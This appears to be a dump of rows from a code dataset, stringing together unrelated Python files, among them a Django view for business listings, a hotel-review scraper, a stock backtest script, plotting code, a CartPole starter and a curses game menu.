u.member = Member.objects.get(pk=member_id)
u.business_cn = request.POST.get("business_cn", None)
u.business_en = request.POST.get("business_en", None)
# if request.POST.get("business_cn", False) or request.POST.get("business_en", False):
# integrity = integrity + 1
u.company_stock_symbol = request.POST.get("company_stock_symbol", None)
#u.company_symbol = request.POST["company_symbol"]
financial_is_must_audit = int(request.POST.get("financial_is_must_audit", 0))
u.financial_is_must_audit = financial_is_must_audit
if financial_is_must_audit == 1:
u.financial_audit_company_is_must_default = True
elif financial_is_must_audit == 2:
u.financial_audit_company_is_must_default = False
# if request.POST["growth_three_year"] != "":
# u.growth_three_year = request.POST["growth_three_year"]
# integrity = integrity + 1
deal_size = request.POST.get("deal_size", False)
if deal_size and deal_size != "":
u.deal_size = deal_size
# integrity = integrity + 1
if request.POST.get("income", False):
u.income = request.POST["income"]
if request.POST.get("income_last_phase", False):
u.income_last_phase = request.POST["income_last_phase"]
# integrity = integrity + 1
u.intro_cn = request.POST.get("intro_cn", None)
u.intro_en = request.POST.get("intro_en", None)
# if request.POST.get("intro_cn", False) or request.POST.get("intro_en", False):
# integrity = integrity + 1
u.is_suitor = int(request.POST.get("is_suitor", "0"))
# u.net_assets = request.POST["net_assets"]
if request.POST.get("profit", False):
u.profit = request.POST["profit"]
if request.POST.get("profit_last_phase", False):
u.profit_last_phase = request.POST["profit_last_phase"]
if request.POST.get("registered_capital", False):
u.registered_capital = request.POST["registered_capital"]
total_assets_last_phase = request.POST.get("total_assets_last_phase", False)
if total_assets_last_phase and total_assets_last_phase != "":
u.total_assets_last_phase = total_assets_last_phase.replace(",", "")
# u.remark_cn = request.POST["remark_cn"]
# u.remark_en = request.POST["remark_en"]
# u.financial_audit_company_name = request.POST["financial_audit_company_name"]
if request.POST.get("expected_enterprice_value", False):
u.expected_enterprice_value = request.POST["expected_enterprice_value"]
# integrity = integrity + 1
name_project_cn = request.POST.get("name_project_cn", False)
if name_project_cn:
u.name_project_cn = name_project_cn
else:
u.name_project_cn = ""
name_project_en = request.POST.get("name_project_en", False)
if name_project_en:
u.name_project_en = name_project_en
else:
u.name_project_en = ""
# if request.POST.get("name_project_cn", False) or request.POST.get("name_project_en", False):
# integrity = integrity + 1
project_stage = request.POST.get("project_stage", False)
if project_stage and project_stage != "":
u.project_stage = project_stage.replace(",", "")
pay_way = request.POST.get("pay_way", False)
if pay_way and pay_way != "":
u.pay_way = pay_way.replace(",", "")
income_enter = request.POST.get("income_enter", False)
if income_enter and income_enter != "":
u.income_enter = income_enter.replace(",", "")
profit_enter = request.POST.get("profit_enter", False)
if profit_enter and profit_enter != "":
u.profit_enter = profit_enter.replace(",", "")
# if request.POST.get("income", False) or request.POST.get("income_enter", False):
# integrity = integrity + 1
#
# if request.POST.get("profit", False) or request.POST.get("profit_enter", False):
# integrity = integrity + 1
total_assets = request.POST.get("total_assets", False)
if total_assets and total_assets != "":
u.total_assets = total_assets.replace(",", "")
# integrity = integrity + 1
total_profit = request.POST.get("total_profit", False)
if total_profit and total_profit != "":
u.total_profit = total_profit.replace(",", "")
# integrity = integrity + 1
'''
no input end
'''
#new column end
u.save()
u.demand_attach.all().delete()
exist_upload_names = request.POST.getlist("exist_upload_names", [])
exist_upload_newNames = request.POST.getlist("exist_upload_newNames", [])
upload_type_names = request.POST.getlist("upload_type_names", [])
upload_types = request.POST.getlist("upload_types", [])
for ut, tn in zip(upload_types, upload_type_names):
uf = request.FILES.get("upload_file_" + ut, False)
if uf:
# if uf.size > 2000000:
# messages.error(request, _("The file cannot be more than 2M"))
# return
da = DemandAttach()
da.demand = u
da.file_name = uf.name
da.file_type = ut
da.file_type_name = tn
da.new_name = _upload_project_file(uf)
da.save()
else:
for t, f, n in zip(upload_types, exist_upload_names, exist_upload_newNames): #if upload not exsit, check the file that has already exsit file
if t == ut:
da = DemandAttach()
da.demand = u
da.file_name = f
da.file_type = ut
da.file_type_name = tn
da.new_name = n
da.save()
break
countries_ids = request.POST.getlist("country", [])
if countries_ids is not None:
integrity = integrity + 1
for id in countries_ids:
if id != "0" and id != "":
u.company_countries = countries_ids
provinces_ids = request.POST.getlist("province", [])
if provinces_ids is not None:
for id in provinces_ids:
if id != "0" and id != "":
c = Province.objects.get(pk=id)
u.company_provinces.add(c)
targetCompanies = request.POST.getlist("target_companies", [])
if targetCompanies:
u.target_companies = request.POST.getlist("target_companies", [])
# industries_ids = request.POST.getlist("industry", [])
industries_ids = request.POST.getlist("industry_id", [])
u.company_industries.clear()
DemandIndustry.objects.filter(demand_id=u.id).delete();
if industries_ids is not None:
integrity = integrity + 1
for id in industries_ids:
if id != "0" and id != "":
c = Industry.objects.get(pk=id)
u.company_industries.add(c)
di = DemandIndustry()
di.demand = u
if c.level == 3:
di.cv3 = c.id
di.cv2 = c.father_id
di.cv1 = c.father.father_id
elif c.level == 2:
di.cv2 = c.id
di.cv1 = c.father_id
else:
di.cv1 = c.id
di.save()
demand_keyword = request.POST.get("project_keyword", False)
if request.lang == "en-us":
u.demand_keyword_en.all().delete()
else:
u.demand_keyword.all().delete()
if demand_keyword:
integrity = integrity + 1
mks = demand_keyword.split(",")
for m in mks:
if request.lang == "en-us":
k = DemandKeywordEn()
else:
k = DemandKeyword()
k.keyword = m
k.demand = u
k.save()
integrity = int(integrity * 100 / 21)
if request.lang == "zh-cn":
u.integrity = integrity
else:
u.integrity_en = integrity
u.save()
return True, "ok"
def _clear_items(u):
u.company_countries.clear()
u.company_industries.clear()
u.company_provinces.clear()
u.target_members.clear()
u.target_companies.clear()
u.target_industries.clear()
@csrf_exempt
def delete(request):
msg = ""
if request.method == 'POST':
id = request.POST["id"]
member = request.session.get('member', None)
member_id = request.session['member']['id']
if member is None:
msg = "nologon"
else:
try:
member=get_object_or_404(Member,id=member_id)
d=Demand.objects.get(pk=id, member_id=member_id)
d.status=StatusDemand.deleted
d.save()
# terry 20150204 remark
write_demand_delete_log(request, member, d)
msg = "success"
except Exception, e:
msg = e.message
return HttpResponse(msg)
@csrf_exempt
def offline(request):
msg = ""
if request.method == 'POST':
id = request.POST["id"]
member = request.session.get('member', None)
member_id = request.session['member']['id']
if member is None:
msg = "nologon"
else:
try:
member=get_object_or_404(Member,id=member_id)
d=Demand.objects.get(pk=id, member_id=member_id)
d.status=StatusDemand.offline
d.save()
write_demand_offline_log(request, member, d)
msg = "success"
except Exception, e:
msg = e.message
return HttpResponse(msg)
@csrf_exempt
@member_login_required
def get_list_for_home(request):
c = {}
if request.method == 'GET':
try:
type = request.GET.get("type", "")
id = request.GET.get("id", "")
q1 = Q(status=StatusDemand.approved)
if type == "industry":
q2 = Q(company_industries=None) | Q(company_industries=id)
else:
q2 = Q(company_countries=None, company_provinces=None, company_cities=None)
location = request.GET.get("location", "")
if location == "city":
q2 = q2 | Q(company_cities=id)
elif location == "province":
q2 = q2 | Q(company_provinces=id)
else:
q2 = q2 | Q(company_countries=id)
if len(q2) > 0:
q1 = q1 & q2
demands = Demand.objects.filter(q1).order_by("-id")[0:10]
c['data'] = demands
except Exception, e:
logger.error(e.message)
return render_to_response("purchase/"+request.lang+"/list_for_home.html", c, context_instance=RequestContext(request))
@member_login_required
def download_attach(request, id):
reload(sys)
sys.setdefaultencoding('utf8')
demand = get_object_or_404(Demand, pk=id)
member_id = request.session['member']['id']
member = Member.objects.get(pk=member_id)
if demand.status != StatusDemand.approved and demand.member_id != member_id:
raise Http404
if demand.demand_attach.count() == 0:
return HttpResponse(_("no attach"))
if demand.is_suitor:
if demand.is_push_to_member(member) is False and demand.member_id != member_id:
return HttpResponse(_("not target"))
path = settings.MEDIA_ROOT + "/demand/"
#please view: http://stackoverflow.com/questions/12881294/django-create-a-zip-of-multiple-files-and-make-it-downloadable
# Files (local path) to put in the .zip
# FIXME: Change this (get paths from DB etc)
#filenames = ["/tmp/file1.txt", "/tmp/file2.txt"]
filenames = []
for attach in demand.demand_attach.all():
filenames.append(path+attach.new_name+"/"+attach.file_name)
# Folder name in ZIP archive which contains the above files
# E.g [thearchive.zip]/somefiles/file2.txt
# FIXME: Set this to something better
#zip_subdir = "somefiles"
zip_subdir = demand.name_cn
if request.lang == "en-us":
zip_subdir = demand.name_en
zip_filename = "%s.zip" % zip_subdir
# Open StringIO to grab in-memory ZIP contents
s = StringIO.StringIO()
# The zip compressor
zf = zipfile.ZipFile(s, "w")
for fpath in filenames:
# Calculate path for file in zip
#fdir, fname = os.path.split(fpath)
fnewname, fname = os.path.split(fpath)
if os.path.isfile(fnewname) is False:
break
#zip_path = os.path.join(zip_subdir, fname)
zip_path = os.path.join(zip_subdir, fname)
# Add file, at correct path
#zf.write(fpath, zip_path)
zf.write(fnewname, zip_path)
# Must close zip for all contents to be written
zf.close()
# Grab ZIP file from in-memory, make response with correct MIME-type
resp = HttpResponse(s.getvalue(), content_type="application/x-zip-compressed")
# ..and correct content-disposition
resp['Content-Disposition'] = 'attachment; filename=%s' % zip_filename.encode("utf8")
member.download_demand_attach(demand)
return resp
def _upload_project_file(f):
file_name = ""
path = settings.MEDIA_ROOT + "/demand/"
try:
if not os.path.exists(path):
os.makedirs(path)
file_ext = os.path.splitext(f.name)[1]
random_no = str(random.randint(0, 99999999)).zfill(8)
# print random_no
file_name = random_no + file_ext
destination = open(path + file_name, 'wb+')
for chunk in f.chunks():
destination.write(chunk)
destination.close()
except Exception, e:
logger.error(e.message)
# print e
return file_name
def find_demands(condition, page, pagesize, sort):
demands = Demand.objects.all()
if condition.keyword != "":
demands = demands.filter(Q(name_cn__contains=condition.keyword) | Q(name_en__contains=condition.keyword))
if condition.type != "" and condition.type != "0" and condition.type != 0:
demands = demands.filter(service_type=condition.type)
if condition.country_id != 0 and condition.country_id != "" and condition.country_id != "0":
demands = demands.filter(Q(company_countries__id=condition.country_id)) #Q(company_countries=None) |
if condition.province_id != 0 and condition.province_id != "" and condition.province_id != "0":
demands = demands.filter(Q(company_provinces__id=condition.province_id)) #Q(company_provinces=None) |
if condition.industry is not None:
demands = demands.filter(Q(company_industries=condition.industry) | Q(company_industries__father=condition.industry) | Q(company_industries__father__father=condition.industry)) #Q(company_industries=None) |
if condition.member_id != 0 and condition.member_id != "":
demands = demands.filter(member_id=condition.member_id)
if condition.status != -1 and condition.status != "":
demands = demands.filter(status=condition.status)
if page <= 1:
page = 1
if pagesize <= 1:
pagesize = 1
start_record = (int(page)-1) * int(pagesize)
end_record = int(start_record) + int(pagesize)
if sort == "":
sort = "time_desc"
if sort == "time_desc":
demands = demands.order_by("-id")
elif sort == "time_asc":
demands = demands.order_by("id")
elif sort == "size_desc":
demands = demands.order_by("-deal_size")
elif sort == "size_asc":
demands = demands.order_by("deal_size")
elif sort == "hot_desc":
demands = demands.order_by("-pv")
total = demands.count()
data = demands[start_record:end_record]
return data, total
|
7,965 | 3ee20391d56d8c429ab1bd2f6b0e5b261721e401 | from django.urls import path
from jobscrapper.views import *
urlpatterns = [
path('', home_vacancies_view, name="vacancy-home"),
path('list/', vacancies_view, name="vacancy"),
] |
7,966 | ba73562cd8ffa52a1fede35c3325e7e76a6dad54 | #!/usr/bin/env python
from __future__ import print_function
from types_ import SimpleObject, SimpleObjectImmutable, NamedTuple, SimpleTuple, c_struct
import timeit
import random
TYPES = [
SimpleObjectImmutable,
SimpleObject,
NamedTuple,
SimpleTuple,
c_struct,
]
a = 1035
b = b'\x54 - fo!'
c = [1, 5, 66, ]
def measure_creation():
random.shuffle(TYPES)
for type_ in TYPES:
pre = 'from __main__ import {}, a, b, c'.format(type_.__name__)
body = '{}(a, b, c)'.format(type_.__name__)
print('\t', type_.__name__, timeit.repeat(stmt=body, setup=pre, repeat=5))
def test_immut():
'''Verifies that the type called SimpleObjectImmutable
actually satisfies that definition.
'''
from types_ import read_only
q = SimpleObjectImmutable(a, b, c)
SimpleObjectImmutable.__setattr__ = read_only
try:
q.a = 1
assert(False)
except ValueError:
assert(True)
if __name__ == '__main__':
measure_creation()
test_immut()
|
7,967 | 6c7162a9bd81d618abda204c24031c5a5acc61b4 | '''
@Description:
@Version: 1.0
@Autor: Henggao
@Date: 2020-02-20 16:17:05
@LastEditors: Henggao
@LastEditTime: 2020-02-20 16:32:45
'''
name = "henggao"
def change():
name = "Brill"
print(name)
print(locals())
print(globals())
change()
print(name) |
7,968 | 05a80a904548e90bea635469b94264f219062560 | def best_rank_selection(generation):
max_selected = len(generation) // 10
sorted_by_fitness = sorted(generation, key=lambda x: x.fitness, reverse=True)
return sorted_by_fitness[:max_selected]
|
7,969 | 931e73ffce6d24dbfb92501670245e20fc403a7a | # -*- coding:utf-8 -*-
from spider.driver.spider.base.spider import *
class LvmamaHotelSpider(Spider):
def get_comment_info2(self,shop_data):
params_list_comment1 = self.params_dict.get(ParamType.COMMENT_INFO_1)
comment_len = shop_data.get(FieldName.SHOP_COMMENT_NUM)
while(True):
comments_list_len = self.until_presence_of_all_elements_located_by_css_selector(
css_selector=params_list_comment1.list_css_selector)
if comments_list_len < comment_len*0.7:
self.driver.refresh()
time.sleep(0.5)
else:
break
self.ismore_by_scroll_page_judge_by_len(css_selector=params_list_comment1.list_css_selector,comment_len=comment_len)
try:
for each in self.until_presence_of_all_elements_located_by_css_selector(
css_selector=params_list_comment1.list_css_selector+' > div.arrow'):
self.until_click_by_vertical_scroll_page_down(click_ele=each)
except Exception as e:
self.error_log(e=e)
#上面在下拉加载页面
external_key={
FieldName.SHOP_URL : shop_data.get(FieldName.SHOP_URL),
FieldName.SHOP_ID : shop_data.get(FieldName.SHOP_ID),
FieldName.SHOP_NAME : shop_data.get(FieldName.SHOP_NAME),
}
self.get_spider_data_list(params_list=params_list_comment1,is_save=True,external_key=external_key,target=self.comments)
def get_comment_info(self):
for shop_data in self.get_current_data_list_from_db(self.shops):
url = shop_data.get(FieldName.COMMENT_URL)
if url:
self.run_new_tab_task(func=self.get_comment_info2,url=url,shop_data=shop_data)
def get_shop_info(self):
self.info_log(data='进入驴妈妈移动版主页...')
self.driver.get('https://m.lvmama.com')
time.sleep(1.5)
self.until_click_by_css_selector(css_selector='#content > div.index-header > a.search.cmAddClick > p')
time.sleep(1)
self.until_send_text_by_css_selector(css_selector='#keyword',text=self.data_region)
self.info_log(data='输入%s...'%self.data_region)
self.until_send_enter_by_css_selector(css_selector='#keyword')
self.info_log(data='搜索%s...'%self.data_region)
time.sleep(1)
self.until_click_by_css_selector(css_selector='#tab_hotel > a')
self.info_log(data='点击%s...'%self.data_source)
time.sleep(3)
params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)
self.until_ismore_by_send_key_arrow_down_judge_by_len(
list_css_selector=params_list_shop1.list_css_selector,ele_css_selector='#tab_hotel > a',
min_frequency=100,max_frequency=500,timeout=1)
self.info_log(data='shopinfo')
params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1) # 获取爬虫数据列表的样式信息
shop_data_list = self.get_spider_data_list(params_list=params_list_shop1,end=18)
params_shop2 = self.params_dict.get(ParamType.SHOP_INFO_2)
shop_data_list = self.add_spider_data_to_data_list(data_list=shop_data_list, isnewtab=True, params=params_shop2,
url_name=FieldName.SHOP_URL,pause_time=1)
for shop_data in shop_data_list:
key = {
FieldName.SHOP_URL: shop_data.get(FieldName.SHOP_URL),
FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),
FieldName.SHOP_NAME : shop_data.get(FieldName.SHOP_NAME),
}
self.save_data_to_db(target=self.shops,key=key,data=shop_data)
def run_spider(self):
self.get_shop_info()
# self.get_comment_info() |
7,970 | 04867e8911f7cb30af6cefb7ba7ff34d02a07891 | #coding: utf8
import sqlite3
from random import shuffle
import argparse
def wordCount(db):
words = {}
for sent, labels in iterReviews(db):
for word in sent:
if word not in words:
words[word] = 1
else:
words[word] += 1
return words
def filterWords(words, min_count=0):
return set(word for word in words if words[word] >= min_count)
def iterReviews(db):
con = sqlite3.connect(db)
c = con.cursor()
i = 0
for pid, uname, rev, rating in c.execute('SELECT item as pid, user as uname, review as rev, rating as rating FROM reviews WHERE NOT test'):
if pid is None or uname is None or rating is None or rev is None:
continue
else:
for sent in rev.split("."):
if len(sent) < 2:
continue
else:
yield (sent.split(" "), ['u_{}'.format(uname),'i_{}'.format(pid), 'r_{}'.format(rating)])
i += 1
def main(args):
f = open(args.output, "w",encoding="utf-8")
buff = []
i = 0
words = filterWords(wordCount(args.db), min_count=args.min_count)
for sent, labels in iterReviews(args.db):
sent = [word for word in sent if word in words]
if len(sent) < args.min_sent_size:
continue
for label in labels:
buff.append("{} {}\n".format(label, " ".join(sent)))
i += 1
if len(buff) >= args.buff_size:
shuffle(buff)
for se in buff:
f.write(se)
buff = []
print("wrote {} sentences".format(i))
shuffle(buff)
for se in buff:
f.write(se)
f.close()
print("wrote {} sentences".format(i))
parser = argparse.ArgumentParser()
parser.add_argument("db", type=str)
parser.add_argument("output", type=str, default="sentences.txt")
parser.add_argument("--min_count", type=int, default=100)
parser.add_argument("--min_sent_size", type=int, default=5)
parser.add_argument("--buff_size", type=int, default=1000000)
args = parser.parse_args()
main(args)
|
7,971 | b297a09ee19bb8069eb65eb085903b3219c6fe5a | import math
import datetime
import numpy as np
import matplotlib.pyplot as plt
def draw_chat(
id, smooth_id, main_mode,
my_name, chat_day_data,
main_plot, pie_plot, list_chats_plot):
min_in_day = 1440
possible_smooth = [1, 2, 3, 4, 5, 6, 8, 9, 10, 12, 15, 16, 18, 20, 24, 30, 32, 36, 40, 45, 48, 60]
possible_smooth = [10, 12, 15, 16, 18, 20, 24, 30, 32, 36, 40, 45, 48, 60]
possible_smooth = [10, 15, 20, 30, 40, 45, 60] #divisors of 1440 (minutes in day)
count_of_chats = len(chat_day_data)
id = (id + count_of_chats) % count_of_chats
smooth_id = (smooth_id + len(possible_smooth)) % len(possible_smooth)
smooth = possible_smooth[smooth_id]
sum_score = chat_day_data[id][2]
calendar = chat_day_data[id][3]
companion_name = chat_day_data[id][0]
def draw_main_plot_as_all():
first_day = 0
def gen_data():
nonlocal first_day
calendar_dates = list(calendar.keys())
ind = [0]
now = min(calendar_dates)
first_day = now
last = max(calendar_dates)
duration = (last - now).days + 1
need_space_btw_labels = duration // 25
labels = [now]
last_label = 0
t = 0
vals = [0] * duration
vals[0] = calendar[now]
while now != last:
now += datetime.timedelta(days=1)
t += 1
if now in calendar_dates:
ind.append(t)
vals[t] = calendar[now]
if t-last_label >= need_space_btw_labels:
last_label = t
labels.append(str(now))
else:
labels.append("")
def make_smoothie(a, shift):
n = len(a)
res = [0] * n
koef = []
for i in range(shift+1):
koef.append( max(0, math.cos(i/(shift+1))**2*2 - 1) )
for i in range(n):
sum = 0
sum_k = 0
for j in range(-shift, shift+1):
if 0 <= i+j < n:
k = koef[abs(j)]
sum += a[i+j] * k
sum_k += k
res[i] = sum / sum_k
return res
s = int((duration/50)**0.5) #random.randint(0,10)
print(duration, s)
vals = make_smoothie(vals, s)
return ind,labels,vals
width = 1 # default value
plot = main_plot
plot.clear()
ind, labels, vals = gen_data()
plot.set_xticks(ind)
plot.set_xticklabels(labels)
plot.xaxis.set_tick_params(rotation=90)
#plot.bar(ind, vals, width)
plot.bar(range(len(vals)), vals, width)
def format_coord(x, y):
day = int(x + 0.5)
day = first_day + datetime.timedelta(days=day)
#print(day,y)
val = 0
if day in calendar:
val = calendar[day]
if val > 512:
val = str(val // 1024) + "." + str(int((val % 1024 / 102.4 + 0.5)))
val += "Kb"
return str(day) + " " + str(val)
return str(day)
plot.format_coord = format_coord
#plot.set_yscale('log')
def draw_main_plot_as_day():
N = min_in_day // smooth
def set_smooth(score, smooth):
res = [0] * N
for i in range(min_in_day):
res[i//smooth] += score[i]
#res[i] = sum(score[i*smooth:(i+1)*smooth])
return res
me_score = set_smooth(sum_score[0], smooth)
he_score = set_smooth(sum_score[1], smooth)
ind = np.arange(N)
width = 1
def gen_time_labels():
# Set step between labels for they count of be near the 24
k = int(N / 24 + 0.5)
def time(t):
# get time in format `h:mm` from `t` as minute
return str(t//60) + ":" + str(t//10%6)+str(t%10)
labels = [time(x*smooth) if x % k == 0 else ""
for x in range(N)]
return labels
width = 0.8 # default value
plot = main_plot
plot.clear()
plot.set_xticks(ind)
plot.set_xticklabels(gen_time_labels())
plot.xaxis.set_tick_params(rotation=90)
p1 = plot.bar(ind, me_score, width)
p2 = plot.bar(ind, he_score, width, bottom=me_score)
plot.legend((p1[0], p2[0]), (my_name, companion_name))
def format_coord(x,y):
x = int(x+0.5)
if 0 <= x < len(me_score) and me_score[x] + he_score[x]:
rate = me_score[x] / (me_score[x] + he_score[x])
return f"rate: {rate*100:.2f}%"
return None
plot.format_coord = format_coord
def draw_main_plot(mode):
if mode == 0:
draw_main_plot_as_day()
else:
draw_main_plot_as_all()
def draw_pie():
sizes = chat_day_data[id][1]
explode = [0, 0, 0.1]
pie_plot.clear()
def get_angle():
# Set green part (forwarded message) in central bottom part
return -90 + 360*(sizes[2]/(2*sum(sizes)))
pie_plot.pie(sizes, wedgeprops=dict(width=1.0), explode=explode, autopct='%1.1f%%',
shadow=True, startangle=get_angle())
pie_plot.format_coord = lambda x,y: None
def draw_list_chats(id):
chats_above = 4
chats_bottom = 5
if count_of_chats < chats_above + 1 + chats_bottom:
chats_above = id
chats_bottom = count_of_chats - id - 1
if id < chats_above:
chats_bottom += chats_above - id
chats_above = id
if id + chats_bottom >= count_of_chats:
chats_bottom = count_of_chats - id - 1
plot = list_chats_plot
N = chats_above + 1 + chats_bottom
people = []
scores = []
for i in range(-chats_above, chats_bottom+1):
people.append(chat_day_data[i+id][0])
scores.append(sum(chat_day_data[i+id][1]))
selected_chat = [0] * N
selected_chat[chats_above] = scores[chats_above]
plot.clear()
plot.set_yticks(range(N))
plot.set_yticklabels(people)
plot.invert_yaxis()
plot.yaxis.tick_right()
plot.invert_xaxis()
plot.axes.get_xaxis().set_visible(False)
#plot.axes.get_yaxis().set_ticks([])
bars = plot.barh(range(N), scores)
plot.barh(range(N), selected_chat)
plot.format_coord = lambda x,y: None
for bar in bars:
continue
height = bar.get_y() + bar.get_height() / 2
width = bar.get_x() + bar.get_width()
plot.annotate(f' {str(width)[:]}',
xy=(width, height),
ha='left', va='center')
draw_main_plot(main_mode)
draw_pie()
draw_list_chats(id)
plt.draw()
|
7,972 | ac32fb5fcd71790f9dbf0794992a9dc92a202c9b | t = eval(input())
while t:
t -= 1
y = []
z = []
x = str(input())
for i in range(len(x)):
if (not int(i)%2):
y.append(x[i])
else:
z.append(x[i])
print("".join(y) + " " + "".join(z))
|
7,973 | 8d5e652fda3fb172e6faab4153bca8f78c114cd1 | from datareader import *
import matplotlib.pyplot as plt
from plotting import *
from misc import *
import leastSquares as lsModel
import masim as mAvgSim
import numpy as np
import pandas as pd
import statistics as stat
from datetime import datetime as dt
from time import mktime
def main():
# scrape_data(pd.read_csv('china_stocks.csv'),location='chineseStocks/',
# start='2019-09-16',end='2020-11-12')
# cypt_scrape = backtest_database('LINK-USD','2019-09-16','2020-11-12',1)
# cypt_scrape.create_csv('/Users/jimmylin/Desktop/Quant_Trading/Trading/')
# df_stock = pd.read_csv('603131.csv')
# df_cypt = pd.read_csv('LINK-USD.csv')
# df_stock = backtest_database('603993.SS','2019-09-16','2020-11-17',1).read_csv(location='chineseStocks/')
# sim = mAvgSim.movingAverageSim(df_stock)
# sim = mAvgSim.movingAverageSim(df_cypt)
# net,num_trades,test_error = sim.run_simulation(ndays=15)
# sim.plot_graph()
# test_stock_list(stock_list=pd.read_csv('china_stocks.csv'),location='chineseStocks/',ndays=4)
daily_signal_checker('china_stocks.csv',location='chineseStocks/')
# update_open_close('china_stocks.csv',location='chineseStocks/')
# tmp = backtest_database('300261.SZ','2019-09-16','2020-02-16',1)
# df_stock = tmp.read_csv('chineseStocks/')
# open_price = tmp.get_today_open()
# df_stock = df_stock.append({'Open' : open_price},ignore_index=True)
# sim = mAvgSim.movingAverageSim(df_stock)
# sim.run_simulation(ndays=5)
# signals = sim.produce_buy_sell(ndays=1)
# print(signals)
def update_portfolio():
portfolio = pd.read_csv(portfolio)
def daily_signal_checker(stocks,location):
ndays=6
# Get updated stock prices (whole csv)
# scrape_data(pd.read_csv(stocks),location='chineseStocks/',
# start='2019-09-16',end='2020-11-24')
# Run through stock list to get opens and predict
stock_list = pd.read_csv(stocks)
for code in stock_list['Code']:
tmp = backtest_database(code,'2019-09-16','2020-11-18',1)
df_stock = tmp.read_csv(location=location)
open_price = float(tmp.get_today_open())
# print(code)
print(open_price)
df_stock = df_stock.append({'Open' : open_price},ignore_index=True)
sim = mAvgSim.movingAverageSim(df_stock)
signals = sim.produce_buy_sell(ndays=ndays)
print("Company:",code,
"Signals:",signals)
def scrape_data(stock_list,location,start,end):
for code in stock_list['Code']:
print("Got Code:",code)
tmp = backtest_database(code,start,end,1)
tmp.create_csv(location=location)
def test_stock_list(stock_list,location,ndays):
returns = pd.DataFrame(columns=['Company','No. Trades','Net return','Test Error'])
for code in stock_list['Code']:
print(code)
df_stock = backtest_database(code,'2019-09-16','2020-02-17',1).read_csv(location=location)
sim = mAvgSim.movingAverageSim(df_stock)
net,num_trades,test_error = sim.run_simulation(ndays=ndays)
if num_trades == 0:
continue
returns = returns.append({
'Company' : code,
'No. Trades' : num_trades,
'Net return' : net,
'Test Error' : test_error
},ignore_index=True)
# print('Company:',code,'\n Number of Trades',num_trades,'\n Net % return',net)
print("Mean Test Error = ", np.mean(returns['Test Error']))
net_profit = np.sum(returns['Net return'])
companies_traded = len(returns)
mean = stat.mean(returns['Net return'])
std = stat.stdev(returns['Net return'])
print("Net Profit =",net_profit,
'\n Total number of companies traded =',companies_traded,
'\n Mean Profit =',mean,
'\n Standard Deviation',std)
print(returns)
if __name__ == "__main__":
main()
|
7,974 | 054d7e4bd51110e752a18a5c0af4432a818ef3b8 | __all__ = ["AddonsRepository", "Addon", "Addons", "Utils"] |
7,975 | 3c79c528cc19380af8f2883b9e35855e29b151a3 | #CartPoleStarter
import gym
## Defining the simulation related constants
NUM_EPISODES = 1000
def simulate():
## Initialize the "Cart-Pole" environment
env = gym.make('CartPole-v0')
for episode in range(NUM_EPISODES):
done = False
# Reset the environment
obv = env.reset()
initial_action = 0 #initial action is to move the cart to the left (arbitrary)
total_reward = 0
steps = 0
while done != True:
# render the simulation
env.render()
# Select an action
if episode == 0:
action = initial_action
# Execute the action
obv, reward, done, _ = env.step(action)
print(obv)
total_reward += reward
steps +=1
#TODO:
#change the action here based on the obv
#make action = 0 (left) or action = 1 (right) based on if-statements
print("Episode", episode, "finished after", steps, "time steps with total reward", total_reward)
if __name__ == "__main__":
simulate()
|
7,976 | a6f03340c2f60c061977fed6807703cdaeb1b7fd | #!/usr/bin/python3
#start up curses
import curses
HEIGHT = 24
WIDTH = 80
TESTING = True
curses.initscr()
stdscr = curses.newwin(HEIGHT, WIDTH, 0, 0)
curses.noecho() #don't echo keys
stdscr.keypad(1)
#function for displaying other players decision
#statement is the number of the other player's death funciton returned
#player is the other player's name
#returns 0 if other player choose to play again and this player doesn't
#want to, if player does want to then returns 1
#returns -1 if other player choose to quit to main menu
def decision(statement, player):
stdscr.clear()
stdscr.border(0)
stdscr.timeout(-1)
decision = "play again" if statement == 1 else "return to main menu"
stdscr.addstr(3, 5, "Your Partner has decided to " + decision)
if statement == 1:
stdscr.addstr(5, 10, "Do you want to play again?")
stdscr.addstr(7, 10, "Press y for yes and n for no")
stdscr.refresh()
while True:
choice = stdscr.getch()
if choice == 110: #choice is n
return 0
elif choice == 121: #choice is y
return 1
elif statement == 0:
stdscr.addstr(5, 5, "You will be taken back to the main menu.")
return -1
#funciton for waiting screen for starting a game as player 1
#takes other player's name
#returns 0 if player wants to return to main menu
#returns 1 if player wants to play again
#returns -1 if while loop is exited (which shouldn't happen)
def death(player):
stdscr.clear()
stdscr.border(0)
stdscr.timeout(100)
stdscr.addstr(3, 5, "You have died. What do you want to do?")
stdscr.addstr(5, 10, "Play Again - Press p")
stdscr.addstr(7, 10, "Return to Main Menu - Press r")
stdscr.refresh()
while True:
#if other player already made a decision
# statement = other player's decision
# choice = decision(statement, player)
# if statement == 1:
# send choice to other player
# if choice == 0 or choice == -1:
# return 0
# elif choice == 1:
# return 1
choice = stdscr.getch()
#send choice to other player
if choice == 114: #choice is r
return 0
elif choice == 112: #choice is p
#choice = get decision back from other player
#if choice == 1:
#print message saying other player agrees to play again
return 1
#elif choice == 0
#print message saying other player quit to main menu
#return 0
return -1
#funciton for waiting screen for starting a game as player 1
#returns 0 if player wants to return to main menu
#returns 1 if a 1st player is chosen
#returns -1 if while loop is exited (which shouldn't happen)
def join():
stdscr.clear()
stdscr.border(0)
stdscr.timeout(-1)
stdscr.addstr(3, 5, "Pick a player to join")
#get list of available players from the server
#loop through them all and display them (maybe only the first 10)
#make a counter for the addstr y value and increment by 2 each loop
stdscr.addstr(5, 10, "Return to Main Menu - Press r")
stdscr.refresh()
while True:
choice = stdscr.getch()
if choice == 114: #choice is r
return 0
#elif check if a first player has been chosen
# send this player's name to first player
# get back first player's name
# return 1
return -1
#funciton for waiting screen for starting a game as player 1
#returns 0 if player wants to return to main menu
#returns 1 if a second player is chosen
#returns -1 if while loop is exited (which shouldn't happen)
def start():
stdscr.clear()
stdscr.border(0)
stdscr.timeout(100)
stdscr.addstr(3, 5, "Waiting for 2nd player")
stdscr.addstr(5, 10, "Return to Main Menu - Press r")
stdscr.refresh()
while True:
choice = stdscr.getch()
if choice == 114: #choice is r
return 0
#elif check if a second player has been chosen
# get second player's name
# send this player's name
# return 1
return -1
def pause():
stdscr.clear()
stdscr.border(0)
stdscr.timeout(-1)
stdscr.addstr(3, 5, "Paused. What do you want to do?")
stdscr.addstr(5, 10, "Continue - Press c")
stdscr.addstr(7, 10, "Swap Controls - Press s")
stdscr.addstr(9, 10, "End Game - Press e")
stdscr.refresh()
while True:
